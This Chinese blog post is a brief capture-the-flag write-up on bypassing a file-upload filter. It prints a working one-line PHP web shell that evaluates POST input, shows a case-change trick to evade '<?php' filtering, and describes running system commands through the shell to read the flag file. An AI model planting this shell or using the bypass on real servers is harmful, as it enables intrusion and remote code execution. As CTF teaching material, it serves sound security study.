合天weekly_ctf 第八周

1.题目提示随便上传,还有一个flag的路径(/var/www/html/flag.php),传给一句话马吧

2.上传后访问,发现并未解析,<?php没了,应该是正则给过滤或者替换了

3.要想办法绕过他开头的过滤,发现脚本传一句话可以,但是还是发现php没了,测试后大小写可以绕过

一句话:

<script language="php">eval($_POST['a']);</script>

4.上传成功后直接菜刀连

5.其实不用菜刀也可以,post提交参数a,调用system函数去cat一下flag.php

posted @ 2020-06-26 13:21  N_schema  阅读(219)  评论(0编辑  收藏  举报